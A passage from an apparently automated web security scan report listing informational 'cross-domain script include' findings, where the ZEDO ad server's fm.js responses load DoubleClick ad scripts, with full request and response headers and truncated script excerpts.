P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:25 GMT
Connection: close
Content-Length: 2107

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.32;sz=160x600;click=http://yads.zedo.com/ads2/c?a=929080%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=22%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=22%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.102. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.22537103643743023 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=16:17:16:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:14 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=18:16:16:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=127
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:14 GMT
Connection: close
Content-Length: 2148

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5236856.2;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=904952%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=18%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=18%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.103. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9142265539229021 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=34:35:34:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=35:34:35:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:49:21 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=35%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=35%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.104. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.799291021295764 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=34:34:33:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1;expires=Tue, 24 May 2011 16:49:17 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=34:34:34:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:17 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
O0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5286815.2;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=34%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=34%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.105. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.18287896654173713 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=11:9:8:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174|2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:2,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:47:39 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=9:11:9:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=163
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:39 GMT
Connection: close
Content-Length: 2073

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=9%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=9%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.106. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.35797286541562734 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=13:11:10:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:47:56 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=11:13:11:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:56 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=145
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:56 GMT
Connection: close
Content-Length: 2147

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=11%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=11%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.107. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5543871392896527 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=35:36:35:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1;expires=Tue, 24 May 2011 16:49:26 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=36:35:36:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=55
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:26 GMT
Connection: close
Content-Length: 2114

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.10;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921885%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=36%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=36%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.108. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5203394870107549 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=33:33:32:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=33:33:33:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:15 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=33%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=33%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.109. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.025508692406337963 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=40:39:42:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=41:39:42:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:44 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=41%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=41%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.110. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5030563876652094 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=34:35:34:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1;expires=Tue, 24 May 2011 16:49:21 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=35:34:35:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:49:21 GMT
Connection: close
Content-Length: 2123

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=35%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=35%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.111. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

